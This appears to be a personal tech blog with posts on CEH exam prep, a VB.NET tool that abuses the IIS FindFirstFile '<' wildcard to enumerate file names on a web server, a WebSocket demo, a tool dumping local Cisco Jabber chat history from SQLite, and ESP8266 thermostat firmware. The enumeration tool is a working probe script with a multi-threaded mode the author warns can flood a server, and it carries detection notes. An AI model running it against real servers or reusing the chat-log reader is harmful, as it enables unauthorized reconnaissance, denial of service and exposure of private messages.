So, today’s the day. I am submitting my application for the CEH exam. To my surprise, they actually care about your training and creds before you take the test, unlike CompTIA’s A+, Network+ or Security+ exams. I attached the link below for anyone who is interested in taking the exam. You require a minimum of two years in the IT security field (professionally I am going on 5+, so I at least have that going for me), and you need to have a supervisor in the field vouch for you to take the exam. I’ve been going up and down Pluralsight’s material and, in a nutshell, it appears to be on the opposite side of the Security+ exam: more on the offensive than the defensive. So let’s just take a peek at the cost of the exam…. do da do do do… $950!? Geezus! Well, looks like it’s back to the good ol’ top ramen diet again for a while.
Exploiting FindFirstFile on WebServers
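So, depending on the version of IIS installed on a server, “<<” or “>>” can be used as a wildcard when browsing to files. The issue sits at the DOS wildcard level (source: Stack Overflow). On the defensive side, a literal “<” or “>” in a request path is not something a normal client sends, so it is worth alerting on in the web logs and rejecting at the request-filtering layer. I need to add more information; I’ll edit this post when I get additional time.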
''' <summary>
''' WinForms front end that probes a web server for file names by sending requests whose
''' path ends in a "&lt;" wildcard followed by a fixed extension, extending the candidate
''' prefix one character at a time whenever the server answers with a non-empty body.
''' </summary>
''' <remarks>
''' From a detection point of view every probe is a GET whose path contains a literal "&lt;"
''' immediately before the extension, issued in strictly increasing character order.
''' That pattern is what to look for in access logs.
''' </remarks>
Public Class Form1
    ' Not referenced anywhere in this listing.
    Dim NewLetter As Char
    ' One shared WebClient; only used from the UI thread by ExplorePath.
    Dim MyWebRequest As New Net.WebClient()
    ' Extension appended to every probe; overwritten from TextBox1 in Button1_Click.
    Dim Extention As String = ".cfm"
    ' Not referenced anywhere in this listing.
    Dim FileLen As Integer = 0
    ' Delay in milliseconds between consecutive probes in the single-threaded path.
    Dim SleepTime As Integer = 1000
    ' Base URL every probe is appended to (plain HTTP).
    Const WebSite As String = "http://MyWebsite.com/"

    ''' <summary>
    ''' Recursively probes names starting with <paramref name="RequestString"/>, trying one
    ''' additional character per call and recursing deeper when a probe returns data.
    ''' </summary>
    ''' <param name="RequestString">Name prefix confirmed so far.</param>
    ''' <param name="LastAscii">
    ''' Character code to append for this probe; 0 means "probe the bare prefix".
    ''' </param>
    Private Sub ExplorePath(ByVal RequestString As String, Optional ByVal LastAscii As Integer = 0)
        ' Pumps the message loop so the form stays responsive; the whole walk runs on the UI thread.
        Application.DoEvents()
        Dim Data As Byte() = Nothing
        Dim NumberOfFilesFound As Integer = 0
        Dim DataLength As Integer = 0
        NumberOfFilesFound = 0
        Debug.WriteLine("Trying: " & WebSite & RequestString & "<" & Extention)
        Try
            If LastAscii = 0 Then
                Data = MyWebRequest.DownloadData(WebSite & RequestString & "<" & Extention)
            Else
                Data = MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & "<" & Extention)
            End If
            ' DataLength is still 0 here, so this is true for any non-empty response body.
            ' NOTE(review): a server that answers unknown paths with a non-empty success page
            ' would make every probe look like a match.
            If DataLength <> Data.Length Then
                If LastAscii = 0 Then
                    ListBox1.Items.Add(RequestString & "<" & Extention)
                Else
                    ListBox1.Items.Add(RequestString & Chr(LastAscii) & "<" & Extention)
                    Try
                        ' Second request without the wildcard: succeeds only if the exact name resolves.
                        MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & Extention)
                        ListBox1.Items.Add("--[" & RequestString & Chr(LastAscii) & Extention & "]--")
                    Catch ex As Exception
                        ' Failure of the exact-name request is deliberately ignored.
                    End Try
                    ' Descend one character deeper, restarting the alphabet at "0" (48).
                    ExplorePath(RequestString & ChrW(LastAscii), 48)
                End If
            End If
        Catch ex As Exception
            ' Any request error (DownloadData throws on HTTP error statuses) is treated as "no match".
            DataLength = 0
        End Try
        ' Advance through the candidate alphabet: 0-9, then A-Z, then stop.
        Select Case LastAscii
            Case 0
                LastAscii = 48
            Case 58
                LastAscii = 65 'A
            Case 91
                LastAscii = 48 'Zero
                Return
            Case Else
                LastAscii += 1
        End Select
        ' Throttle: one probe per SleepTime milliseconds. Blocks the UI thread while sleeping.
        Threading.Thread.Sleep(SleepTime)
        ' NOTE(review): iteration is done by recursion, so stack depth grows with every probe.
        ExplorePath(RequestString, LastAscii)
    End Sub

    ''' <summary>
    ''' Starts the walk: 26 background threads (one per letter A-Z) when TextBox2 is empty,
    ''' otherwise a single throttled walk from the prefix typed into TextBox2.
    ''' </summary>
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        ' Author's own warning follows. The threaded path below runs 26 workers and
        ' ExplorePathThread contains no sleep, so the request rate is bounded only by
        ' server latency. On the receiving side this looks like a flood from one client.
        'THIS CAN DOS THE SYSTEM
        'Add a Sleep Command
        'Exit Sub
        Dim MyThread(25) As Threading.Thread
        Dim MyThreadClass(25) As ThreadClassAction
        If TextBox2.Text = "" Then
            For i = 0 To 25
                MyThreadClass(i) = New ThreadClassAction
                MyThreadClass(i).CallBack = Me
                MyThread(i) = New Threading.Thread(AddressOf MyThreadClass(i).Launch)
                ' The thread name doubles as the starting prefix (see ThreadClassAction.Launch).
                MyThread(i).Name = Chr(Asc("A") + i)
                MyThread(i).IsBackground = True
                MyThread(i).Start()
            Next
        Else
            ' Only this single-threaded path honours the extension typed into TextBox1;
            ' the worker threads keep their own default of ".cfm".
            Extention = TextBox1.Text
            ExplorePath(TextBox2.Text)
            MsgBox("Done!")
        End If
    End Sub
End Class

''' <summary>
''' Small carrier object used to hand one result string from a worker thread to the form.
''' </summary>
Public Class ThreadClass
    ' Assigned by the worker but not read by the methods below, which use the default Form1 instance.
    Public CallBack As Form
    ' Text to append to the list box on the next AddListItem call.
    Public Data As String

    ''' <summary>Appends <see cref="Data"/> to the wildcard-match list (ListBox1).</summary>
    Public Sub AddListItem1()
        Form1.ListBox1.Items.Add(Data)
    End Sub

    ''' <summary>Appends <see cref="Data"/> to the exact-name list (ListBox2).</summary>
    Public Sub AddListItem2()
        Form1.ListBox2.Items.Add(Data)
    End Sub
End Class

''' <summary>
''' Per-thread worker: the same walk as Form1.ExplorePath, but started from the thread's name,
''' reporting results through Control.Invoke and with no delay between requests.
''' </summary>
Public Class ThreadClassAction
    ' Form used to marshal list-box updates back onto the UI thread.
    Public CallBack As Form
    ' Each worker owns its own WebClient instance.
    Dim MyWebRequest As New Net.WebClient()
    Private Delegate Sub MyDelPtr()
    ' Never assigned from the form in this listing, so workers always probe ".cfm".
    Public Extention As String = ".cfm"
    Const WebSite As String = "http://MyWebsite.com/"

    ''' <summary>Thread entry point; uses the current thread's name as the initial prefix.</summary>
    Public Sub Launch()
        ExplorePathThread(Threading.Thread.CurrentThread.Name)
    End Sub

    ''' <summary>
    ''' Threaded counterpart of Form1.ExplorePath.
    ''' </summary>
    ''' <param name="RequestString">Name prefix confirmed so far.</param>
    ''' <param name="LastAscii">
    ''' Character code to append for this probe; 0 means "probe the bare prefix".
    ''' </param>
    Private Sub ExplorePathThread(ByVal RequestString As String, Optional ByVal LastAscii As Integer = 0)
        ' Logged on every call, not only when the thread starts.
        Debug.WriteLine("Starting Thread: " & Threading.Thread.CurrentThread.Name)
        Application.DoEvents()
        ' A fresh carrier and pair of delegates are created on every recursion step.
        Dim MyThreadClass As New ThreadClass
        MyThreadClass.CallBack = CallBack
        Dim MyDel1 = New MyDelPtr(AddressOf MyThreadClass.AddListItem1)
        Dim MyDel2 = New MyDelPtr(AddressOf MyThreadClass.AddListItem2)
        Dim Data As Byte() = Nothing
        Dim NumberOfFilesFound As Integer = 0
        Dim DataLength As Integer = 0
        NumberOfFilesFound = 0
        Debug.WriteLine("Trying: " & WebSite & RequestString & "<" & Extention)
        Try
            If LastAscii = 0 Then
                Data = MyWebRequest.DownloadData(WebSite & RequestString & "<" & Extention)
            Else
                Data = MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & "<" & Extention)
            End If
            ' As in Form1.ExplorePath, DataLength is 0 here: any non-empty body counts as a match.
            If DataLength <> Data.Length Then
                If LastAscii = 0 Then
                    MyThreadClass.Data = (RequestString & "<" & Extention)
                    ' Invoke blocks until the UI thread has appended the item.
                    CallBack.Invoke(MyDel1)
                Else
                    MyThreadClass.Data = (RequestString & Chr(LastAscii) & "<" & Extention)
                    CallBack.Invoke(MyDel1)
                    Try
                        MyWebRequest.DownloadData(WebSite & RequestString & Chr(LastAscii) & Extention)
                        MyThreadClass.Data = ("--[" & RequestString & Chr(LastAscii) & Extention & "]--")
                        CallBack.Invoke(MyDel2)
                    Catch ex As Exception
                        ' Failure of the exact-name request is deliberately ignored.
                    End Try
                    ExplorePathThread(RequestString & ChrW(LastAscii), 48)
                End If
            End If
        Catch ex As Exception
            DataLength = 0
        End Try
        ' Advance through the candidate alphabet: 0-9, then A-Z, then stop.
        Select Case LastAscii
            Case 0
                LastAscii = 48
            Case 58
                LastAscii = 65 'A
            Case 91
                LastAscii = 48 'Zero
                Return
            Case Else
                LastAscii += 1
        End Select
        ' No Thread.Sleep here, unlike Form1.ExplorePath: this is the unthrottled path
        ' the author's warning in Button1_Click refers to.
        ExplorePathThread(RequestString, LastAscii)
    End Sub
End Class
Working with HTML5 WebSockets and Live updates via .NET
Here is an example of a drawup I threw together to allow dynamic row updating.
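<!DOCTYPE html>
<html>
<head>
<script>
    // Opens the caption feed. [WANIP] and [WANPORT] are placeholders for the server endpoint.
    // NOTE(review): ws:// is plaintext, so anyone on the path can read or alter the captions.
    // Switch to wss:// once the server side terminates TLS.
    var ClosedCaptioningSocket = new WebSocket("ws://[WANIP]:[WANPORT]/", "protocolOne");

    // Once connected, send the greeting the server waits for and reveal the caption panel.
    ClosedCaptioningSocket.onopen = function (event) {
        ClosedCaptioningSocket.send("Here's some text that the server is urgently awaiting!");
        document.getElementById("CCDiv").style.display = 'block';
    };

    // Append each incoming message and keep the newest line in view.
    ClosedCaptioningSocket.onmessage = function (event) {
        var captionBox = document.getElementById("HTML5CC");
        // Use .value rather than .innerHTML: the payload comes from the network and must be
        // treated as text, never parsed as markup (which would also decode entities like &amp;).
        captionBox.value += event.data;
        captionBox.scrollTop = captionBox.scrollHeight;
    };
</script>
</head>
<body>
<!-- Hidden until the socket opens; the stray ';' after the style attribute has been removed. -->
<div id="CCDiv" name="CCDiv" style="display:none;">
    <br><br>
    Closed Captioning
    <br>
    <!-- readonly is a boolean attribute: readonly="false" still made the box read-only,
         so it is written here in the form that says what it does. -->
    <textarea name="HTML5CC" id="HTML5CC" rows="5" cols="200" readonly></textarea>
</div>
</body>
</html>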
Under the hood, to send the data from .NET, create a socket and, once a client is connected, send the data out with something like this.
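''' <summary>
''' Sends <paramref name="Data"/> to the connected client as one unfragmented, unmasked
''' WebSocket text frame (FIN set, opcode 1).
''' </summary>
''' <param name="Data">Text to send; it is encoded as UTF-8 before framing.</param>
''' <remarks>
''' The original wrote the payload length straight into the second header byte. That byte only
''' carries lengths 0-125: 126 and 127 are markers for an extended length field, values from
''' 128 up set the MASK bit, and anything above 255 made Convert.ToByte throw OverflowException.
''' The header is now built with the 16-bit or 64-bit extended length when needed.
''' Frames sent from server to client are left unmasked.
''' </remarks>
Public Sub SendData(Data As String)
    Dim Stream As NetworkStream = _TcpClient.GetStream()
    Dim Payload As Byte() = System.Text.Encoding.UTF8.GetBytes(Data)
    Dim FinAndOpcode As Byte = Convert.ToByte("10000001", 2) 'FIN is set, and OPCODE is 1 or Text

    Dim Header As Byte()
    If Payload.Length <= 125 Then
        ' Short form: the length fits in the 7-bit length field.
        Header = New Byte() {FinAndOpcode, CByte(Payload.Length)}
    ElseIf Payload.Length <= 65535 Then
        ' 126 announces a 2-byte big-endian length.
        Header = New Byte() {FinAndOpcode, CByte(126), CByte((Payload.Length >> 8) And &HFF), CByte(Payload.Length And &HFF)}
    Else
        ' 127 announces an 8-byte big-endian length.
        Header = New Byte(9) {}
        Header(0) = FinAndOpcode
        Header(1) = CByte(127)
        Dim Remaining As Long = Payload.LongLength
        For Position As Integer = 9 To 2 Step -1
            Header(Position) = CByte(Remaining And &HFF)
            Remaining >>= 8
        Next
    End If

    ' VB array sizes are upper bounds, hence the -1. Sizing the array one element too large
    ' appends a stray 0 byte that the client reads as the start of another frame.
    Dim Frame As Byte() = New Byte(Header.Length + Payload.Length - 1) {}
    Buffer.BlockCopy(Header, 0, Frame, 0, Header.Length)
    Buffer.BlockCopy(Payload, 0, Frame, Header.Length, Payload.Length)

    ' Header and payload go out in a single write.
    Stream.Write(Frame, 0, Frame.Length)
End Sub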
Pulling Jabber Chat Logs
So this little piece came in handy to pull and archive chat logs from the client’s local machine. We only just moved to version 11.9, and it now seems to have broken/encrypted the database (finally). But for anyone else still running an older version…
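Imports System.Text.RegularExpressions

''' <summary>
''' Reads the current user's local Jabber history database and writes every stored message
''' to the debug output, newest first, then terminates the application.
''' </summary>
''' <remarks>
''' The database is opened with a plain SQLite connection and no key, so the message bodies
''' are readable by any process running as that user. Anything exported from it holds the
''' same clear-text content and needs the same access controls as the source profile.
''' </remarks>
Public Class Form1

    ''' <summary>
    ''' Runs the export as soon as the form loads.
    ''' </summary>
    Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        ' [DOMAIN] is a placeholder for the account's domain part.
        ' NOTE(review): the profile root is hard-coded to C:\Users\<name>.
        Dim strDB As String = "Data Source=" & "C:\Users\" & Environment.UserName & "\AppData\Local\Cisco\Unified Communications\Jabber\CSF\History\" & Environment.UserName & "@[DOMAIN].db" & ";pooling=false"

        ' Built once instead of once per row: pulls the text between <div> and </div>.
        Dim MessageBody As New Regex("(?:<div>)(.+)<\/div>", RegexOptions.IgnoreCase)

        Using Sqlight As SQLite.SQLiteConnection = New SQLite.SQLiteConnection(strDB)
            Using Sqlcmd As SQLite.SQLiteCommand = Sqlight.CreateCommand()
                ' Fixed query text with no user input.
                Sqlcmd.CommandText = "Select * from history_message order by date desc"
                Sqlight.Open()
                Try
                    Using myReader As SQLite.SQLiteDataReader = Sqlcmd.ExecuteReader()
                        While myReader.Read
                            ' Column 2 is matched as the message markup and column 4 is printed as
                            ' the label. Presumably body and sender; verify against the schema.
                            Dim m As Match = MessageBody.Match(myReader.GetString(2))
                            ' Column 3 is read as a Unix timestamp. Only the disabled debug line uses it.
                            Dim EpochSeconds As Integer = myReader.GetInt32(3)
                            'Debug.WriteLine(myReader.GetString(4) & " - " & FromUnix(EpochSeconds, False) & ":" & m.Groups(1).ToString)
                            ' When the pattern does not match, Groups(1) is empty and only the label is printed.
                            Debug.WriteLine(myReader.GetString(4) & " - " & m.Groups(1).ToString)
                        End While
                    End Using
                Catch ex As Exception
                    ' A failing row (e.g. a NULL column) ends the export; the reason is logged.
                    Debug.WriteLine(ex.Message)
                End Try
            End Using
        End Using

        ' Terminates the process immediately once the export is finished.
        End
    End Sub

    ''' <summary>The Unix epoch, 1970-01-01T00:00:00 UTC.</summary>
    Public ReadOnly Property Epoch() As DateTime
        Get
            Return New DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)
        End Get
    End Property

    ''' <summary>Converts Unix seconds to a <see cref="DateTime"/>.</summary>
    ''' <param name="seconds">Seconds since the Unix epoch.</param>
    ''' <param name="local">True to convert the result to local time; otherwise it stays UTC.</param>
    ''' <returns>The corresponding point in time.</returns>
    Public Function FromUnix(ByVal seconds As Integer, local As Boolean) As DateTime
        Dim dt = Epoch.AddSeconds(seconds)
        If local Then dt = dt.ToLocalTime
        Return dt
    End Function

    ''' <summary>Converts a <see cref="DateTime"/> to Unix seconds.</summary>
    ''' <param name="dt">Time to convert; local times are converted to UTC first.</param>
    ''' <returns>Whole seconds since the Unix epoch.</returns>
    ''' <remarks>The result is a 32-bit Integer, so CInt throws for dates past January 2038.</remarks>
    Public Function ToUnix(ByVal dt As DateTime) As Integer
        If dt.Kind = DateTimeKind.Local Then dt = dt.ToUniversalTime
        Return CInt((dt - Epoch).TotalSeconds)
    End Function
End Class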
ESP8266 NONOS SDK DHT Thermastat
So this weekend, I ended up overhauling my ESP8266 DHT library to make it plug and play into other projects. One big thing to take away from this is that GPIO15 is off limits, because the pin is required to be low / grounded during boot or the ESP will not use SPI to start up.
GPIO16 is also off limits for GPIO toggling. With that being said, GPIO 6-11 are off limits as well, since they are used for SPI. So what’s left? Not much. I’m testing with GPIO13 at the moment to see if it can handle the data line floating while the ESP is rebooting.
//https://www.mikrocontroller.net/attachment/263828/The-ESP8266-Book-August-2015.pdf
#include "ets_sys.h"
#include "osapi.h"
#include "gpio.h"
#include "os_type.h"
#include "ip_addr.h"
#include "mem.h"
#include "user_interface.h"
#include "lwip/stats.h"
#include "espconn.h"
#include "c_types.h"
////ONE WIRE
#include "../library/uart.h" //Copy these from your Driver Lib to your local folder
#include "../library/gpio16.h" //Copy these from your Driver Lib to your local folder
#include "../library/common.h"
#include "../library/dht.h"
#include "../library/station.h"
#include "../library/sockets.h"
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////

/* Task priority and queue for system_os_task(); only the commented-out call in user_init() uses them. */
#define user_procTaskPrio 0
#define user_procTaskQueueLen 1
os_event_t user_procTaskQueue[user_procTaskQueueLen];

/*
 * Called by the station library once the Wi-Fi connection is up (registered in
 * myDHTFunctionCallback). Logs the current reading, claims a free socket slot and
 * queues an HTTP GET that reports temperature (converted to Fahrenheit) and humidity
 * to DOMAIN.
 *
 * NOTE(review): the report is a plaintext HTTP request, and per the comment on
 * init_station() below the device joins an open access point. The readings and the
 * query-string identifiers are therefore visible to, and modifiable by, anyone on that
 * network; the server should not trust these values without some form of authentication.
 */
void ICACHE_FLASH_ATTR StationConnected()
{
	os_printf("[%s]\r\n", __func__);
	os_printf("Socket function Temp = %d *F, Hum = %d %%\n", (int)(GlobalReading.temperature * 1.8 + 32), (int)(GlobalReading.humidity));
	init_sockets(NULL, NULL, NULL, NULL); //Do not override Socket.H callbacks
	//Creates Timer Socket
	uint8 FreeSocket = GetFreeSocket();
	if (FreeSocket == 255) /* 255 is treated as "no slot available" */
	{
		os_printf("No Free socket avilable\r\n");
		return;
	}
	/* NOTE(review): os_strcpy and os_sprintf write without a length bound. The sizes of
	 * Name and DataToSend are declared outside this listing; confirm both can hold these
	 * strings for the longest DOMAIN value. */
	os_strcpy(MySendDataStruct[FreeSocket].Name, "MyThermSocket");
	MySendDataStruct[FreeSocket].Domain = DOMAIN;
	/* ssid, IP and ID are fixed literal values here; only temp and hum are filled in. */
	os_sprintf(MySendDataStruct[FreeSocket].DataToSend, "GET /MyEsp.php?ssid=myssid&IP=MyIp2&ID=MyId2&temp=%d&hum=%d HTTP/1.1\r\nUser-Agent: SomeAgent\r\nHost: %s\r\nAccept: */*\r\n\r\n", (int)(GlobalReading.temperature * 1.8 + 32), (int)(GlobalReading.humidity), DOMAIN);
	StartSendingSocketTimer(FreeSocket);
}

/*
 * Callback handed to init_ThermostatSettings(); logs the reading and starts the Wi-Fi
 * station, with StationConnected() as the "connected" handler.
 *
 * The MyReading argument is not used; the values are taken from the global
 * GlobalReading instead.
 */
void ICACHE_FLASH_ATTR myDHTFunctionCallback(struct sensor_GlobalReading * MyReading)
{
	os_printf("[%s]\r\n", __func__);
	os_printf("Callback function Temp = %d *F, Hum = %d %%\n", (int)(GlobalReading.temperature * 1.8 + 32), (int)(GlobalReading.humidity));
	init_station("Thermastat.local", true, &StationConnected); //Connect to strongest open AP
}

/*
 * Runs once the SDK has finished initialising (registered in user_init). Loads the
 * thermostat configuration from flash, writes a default configuration if needed, then
 * starts the sensor with myDHTFunctionCallback as the reading callback.
 */
void ICACHE_FLASH_ATTR sdk_init_done_cb(void)
{
	os_printf("[%s] initializing ESP8266!\r\n", __func__);
	SpiFlashOpResult ReadResult = spi_flash_read(ThermMemorySpace,(uint32 *)&ThermostatConfig,sizeof(ThermostatConfig));
	/* NOTE(review): the trailing "|| true" makes this condition always true, so the settings
	 * are rewritten to flash on every boot whatever the read returned and the else branch is
	 * unreachable. Looks like a testing override; confirm before relying on stored settings. */
	if (ReadResult != SPI_FLASH_RESULT_OK || ThermostatConfig.programmed != 1 || true) //If not set, Set it..
	{
		os_printf("Setting's not found, Calling Set_ThermostatSettings\r\n");
		//NOTE: Don't use GPIO16/D0, This is reserved.
		//DHT22 GPIO=GPIO0/D3 Power=GPIO15/D8 PollingEnabled Interval=5Min SendOnInit=true SendIfOnlyIf=false tempatureDegrees=40 classification="warmer" DeepSleepAfterSend DeepSleepTime Enabled Reserved
		//SpiFlashOpResult writeResult = Set_ThermostatSettings(MySensor_DHT22, 0, 15, true, 5, true, false, 40, "warmer", false, NULL, true, NULL);
		//DHT22 Data=GPIO15/D8 Power=GPI13/D7 PollingEnabled Interval=5Min SendOnInit=true SendIfOnlyIf=false tempatureDegrees=40 classification="warmer" DeepSleepAfterSend DeepSleepTime Enabled Reserved
		/* NOTE(review): the comment above says Data=GPIO15 / Power=GPIO13, but the other
		 * commented-out calls list the data pin first, which would make this call
		 * Data=GPIO13 / Power=GPIO15. Confirm against Set_ThermostatSettings. */
		SpiFlashOpResult writeResult = Set_ThermostatSettings(MySensor_DHT22, 13, 15, true, 5, true, false, 40, "warmer", false, NULL, true, NULL);
		//DHT22 GPIO=GPIO0/D3 Power=GPIO4/D2 PollingEnabled Interval=1Min SendOnInit=true SendIfOnlyIf=false tempatureDegrees=NULL classification=warmer/colder DeepSleepAfterSend DeepSleepTime Enabled Reserved
		//Set_ThermostatSettings(MySensor_DHT22, 0, 4, true, 1, true, false, NULL, "warmer", false, 5, true, NULL);
		/* The sensor is started only if the settings write succeeded; a failed write is silent. */
		if (writeResult == SPI_FLASH_RESULT_OK)
		{
			init_ThermostatSettings(&myDHTFunctionCallback);
		}
	}
	else
	{
		init_ThermostatSettings(&myDHTFunctionCallback);
	}
}

/*
 * Firmware entry point: configures the UART divider for 115200 baud, sets the Wi-Fi
 * opmode and sleep type, initialises GPIO with interrupts disabled, and defers the rest
 * of start-up to sdk_init_done_cb().
 */
void ICACHE_FLASH_ATTR user_init()
{
	//void uart0_tx_buffer(uint8 *buf, uint16 len)
	uart_div_modify(0, UART_CLK_FREQ / 115200);
	wifi_set_opmode(0); /* presumably NULL_MODE, radio idle until init_station() runs; confirm against the SDK */
	wifi_set_sleep_type( NONE_SLEEP_T );
	ETS_GPIO_INTR_DISABLE();// Disable gpio interrupts
	gpio_init();
	//Start os task
	system_init_done_cb(sdk_init_done_cb);
	//system_os_task(loop, user_procTaskPrio, user_procTaskQueue, user_procTaskQueueLen); //Task to Signal for later
}